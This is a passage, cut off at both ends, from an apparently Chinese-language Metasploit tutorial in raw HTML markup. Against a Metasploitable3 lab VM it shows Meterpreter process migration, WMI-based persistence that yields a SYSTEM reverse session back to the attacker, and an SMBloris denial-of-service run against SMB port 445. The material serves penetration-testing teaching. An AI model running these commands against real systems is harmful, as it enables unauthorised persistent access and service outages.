class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span> <span class=\"hljs-string\">C:\\Windows\\system32\\csrss.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">324<\/span> <span class=\"hljs-number\">5624 <\/span><span class=\"hljs-string\">explorer.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">METASPLOITABLE3\\vagrant<\/span> <span class=\"hljs-string\">C:\\Windows\\Explorer.EXE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">.....<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">migrate<\/span> <span class=\"hljs-string\">-N<\/span> <span class=\"hljs-string\">explorer.exe<\/span> <span class=\"hljs-string\">\/\/\u8fdb\u7a0b\u8fc1\u79fb\u4e0d\u4e00\u5b9a\u6bcf\u6b21\u90fd\u80fd\u6210\u529f\uff0c\u53ef\u4ee5\u591a\u8bd5\u51e0\u6b21<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Migrating<\/span> <span class=\"hljs-string\">from<\/span> <span class=\"hljs-number\">1088 <\/span><span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">5624<\/span><span class=\"hljs-string\">...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Migration<\/span> <span class=\"hljs-string\">completed<\/span> <span class=\"hljs-string\">successfully.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u7136\u540e\u518d\u6b21\u653b\u51fb<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt; background<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Backgrounding session <span class=\"hljs-number\">1.<\/span>..<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows<span class=\"hljs-regexp\">\/local\/<\/span>wmi_persistence) &gt; exploit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Installing Persistence...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] - Bytes <span class=\"hljs-attr\">remaining:<\/span> <span class=\"hljs-number\">12560<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] - Bytes <span class=\"hljs-attr\">remaining:<\/span> <span class=\"hljs-number\">4560<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] Payload successfully staged.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] Persistence installed! Call a shell using <span class=\"hljs-string\">\"smbclient \\\\\\\\192.168.177.144\\\\C$ -U Administrator &lt;arbitrary password&gt;\"<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Clean up Meterpreter RC <span class=\"hljs-attr\">file:<\/span> <span class=\"hljs-regexp\">\/root\/<\/span>.msf4<span class=\"hljs-regexp\">\/logs\/<\/span>wmi_persistence<span class=\"hljs-regexp\">\/192.168.177.144_20190428.2114\/<\/span><span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>_20190428<span class=\"hljs-number\">.2114<\/span>.rc<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows<span class=\"hljs-regexp\">\/local\/<\/span>wmi_persistence) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>\u6ce8\u9500\u76ee\u6807\u673a\u767b\u5f55\uff0c\u7136\u540e\u91cd\u65b0\u767b\u5f55\uff0c<code>msfconsole<\/code>\u8fd9\u8fb9\u5c31\u4f1a\u63a5\u6536\u5230\u56de\u8fde\u7684\u4f1a\u8bdd<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4433<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:49437)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 12:27:54<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-i<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">interaction<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-number\">2<\/span><span class=\"hljs-string\">...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Server username:<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Computer :<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OS :<\/span> <span class=\"hljs-string\">Windows<\/span> <span class=\"hljs-number\">2008 <\/span><span class=\"hljs-string\">R2<\/span> <span class=\"hljs-string\">(Build<\/span> <span class=\"hljs-number\">7601<\/span><span class=\"hljs-string\">,<\/span> <span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">Pack<\/span> <span class=\"hljs-number\">1<\/span><span class=\"hljs-string\">).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Architecture :<\/span> <span class=\"hljs-string\">x64<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">System Language :<\/span> <span class=\"hljs-string\">en_US<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Domain :<\/span> <span class=\"hljs-string\">WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Logged On Users :<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Meterpreter :<\/span> <span class=\"hljs-string\">x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">9\u3001\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/h4>\n<p>\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u901a\u5e38\u662f\u901a\u8fc7\u5411\u76ee\u6807\u673a\u8bf7\u6c42\u5927\u91cf\u7684\u8d44\u6e90\u6216\u5229\u7528\u6f0f\u6d1e\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u6d88\u8017\u76ee\u6807\u673a\u5668\u6027\u80fd\uff0c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u4f1a\u5bfc\u81f4\u5408\u6cd5\u7528\u6237\u65e0\u6cd5\u8bbf\u95ee\u8ba1\u7b97\u673a\u670d\u52a1\u6216\u8d44\u6e90\uff0c\u751a\u81f3\u53ef\u80fd\u4f1a\u5bfc\u81f4\u670d\u52a1\u6216\u64cd\u4f5c\u7cfb\u7edf\u5d29\u6e83\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p><code>SMBloris<\/code>\u662f\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u4e86<code>20<\/code>\u00a0\u5e74\u7684\u00a0<code>Windows SMB<\/code>\u00a0\u6f0f\u6d1e\uff0c\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb(\u00a0<code>DoS<\/code>\u00a0) , \u4f7f\u5f97\u5927\u89c4\u6a21\u670d\u52a1\u5668\u762b\u75ea\u3002\u5f71\u54cd\u6240\u6709\u7248\u672c\u7684\u00a0<code>SMB<\/code>\u00a0\u534f\u8bae\u4ee5\u53ca\u6240\u6709<code>Windows 2000<\/code>\u00a0\u4e4b\u540e\u7684\u7cfb\u7edf\u7248\u672c\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>1\u3001\u5728\u8fdb\u884c<code>SMBloris<\/code>\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u4e4b\u524d\uff0c\u8981\u5148\u8bbe\u7f6e\u653b\u51fb\u673a\u7684\u6700\u5927\u8fde\u63a5\u6570\u3002<\/p>\n<pre><code class=\"hljs linux copyable ruby\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">root@osboxes<span class=\"hljs-symbol\">:~<\/span><span class=\"hljs-comment\"># ulimit -n 65535<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">root@osboxes<span class=\"hljs-symbol\">:~<\/span><span class=\"hljs-comment\"># ulimit -n<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">65535<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">root@osboxes<span class=\"hljs-symbol\">:~<\/span><span class=\"hljs-comment\">#<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable ruby\"><\/code><\/pre>\n<p>2\u3001\u7136\u540e\u4f7f\u7528<code>smb_loris<\/code>\u6a21\u5757\u6765\u653b\u51fb\u76ee\u6807\u673a\u673a\u5668<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">auxiliary(dos\/smb\/smb_loris)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">auxiliary(dos\/smb\/smb_loris)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">run<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">server...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">100<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">200<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">300<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">400<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">500<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">600<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">700<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">800<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">900<\/span> <span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">1000 <\/span><span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">At<\/span> <span class=\"hljs-string\">open<\/span> <span class=\"hljs-string\">socket<\/span> <span class=\"hljs-string\">limit<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-number\">1017 <\/span><span class=\"hljs-string\">sockets<\/span> <span class=\"hljs-string\">open.<\/span> <span class=\"hljs-string\">Try<\/span> <span class=\"hljs-string\">increasing<\/span> <span class=\"hljs-string\">you<\/span> <span class=\"hljs-string\">system<\/span> <span class=\"hljs-string\">limits.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span 